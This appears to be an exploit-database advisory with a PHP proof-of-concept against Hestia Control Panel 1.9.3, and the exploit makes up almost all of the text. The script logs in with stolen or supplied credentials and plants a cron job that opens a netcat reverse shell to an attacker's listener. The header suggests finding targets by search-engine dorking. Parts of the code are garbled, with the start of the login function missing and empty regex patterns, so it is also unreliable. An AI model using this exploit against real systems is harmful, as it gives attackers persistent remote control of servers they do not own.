============================================================================================================================================= | # Title : Hestia Control Panel 1.9.3 PHP code injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) | | # Vendor : https://hestiacp.com/ | ============================================================================================================================================= POC : [+] Dorking İn Google Or Other Search Enggine. [+] Code Description: This code is a PHP exploit that targets the cronjobs system on a specific server, by executing commands remotely after logging in. (Related : https://packetstorm.news/files/id/189606/ Related CVE numbers: ) . [+] save code as poc.php. [+] Usage: php script.php [+] PayLoad : /', $token_response, $matches)) { echo "Failed to retrieve login token\n"; return [null, null]; } $token = $matches[1]; $postData = http_build_query([ 'token' => $token, 'user' => $username ]); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "$url/login/"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $postData); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); $username_response = curl_exec($ch); curl_close($ch); if (!preg_match('//', $username_response, $matches)) { echo "Failed to retrieve password token\n"; return [null, null]; } $token = $matches[1]; $postData = http_build_query([ 'token' => $token, 'password' => $password ]); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "$url/login/"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $postData); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_HEADER, true); curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt'); $password_response = curl_exec($ch); curl_close($ch); if (strpos($password_response, 'login') !== false) { echo "Login failed!\n"; return [null, null]; } echo "Login successful!\n"; return ['cookies.txt', $token]; } function create_cron($url, $cookieFile, $listener_ip, $listener_port, $token) { $cron_payload = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc $listener_ip $listener_port >/tmp/f"; $postData = http_build_query([ 'token' => $token, 'ok' => 'Add', 'v_cmd' => $cron_payload, 'v_min' => '*', 'v_hour' => '*', 'v_day' => '*', 'v_month' => '*', 'v_wday' => '*' ]); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "$url/add/cron/"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $postData); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookieFile); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); $cron_response = curl_exec($ch); curl_close($ch); if (strpos($cron_response, 'cron') !== false) { echo "Cronjob successfully generated!\n"; return true; } echo "Failed to create cronjob.\n"; return false; } if ($argc < 6) { echo "Usage: php script.php \n"; exit(1); } $url = $argv[1] ?? ''; $username = $argv[2] ?? ''; $password = $argv[3] ?? ''; $listener_ip = $argv[4] ?? ''; $listener_port = $argv[5] ?? ''; list($cookieFile, $token) = login($url, $username, $password); if ($cookieFile) { if (create_cron($url, $cookieFile, $listener_ip, $listener_port, $token)) { echo "Cronjob created, waiting for connection...\n"; } } Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================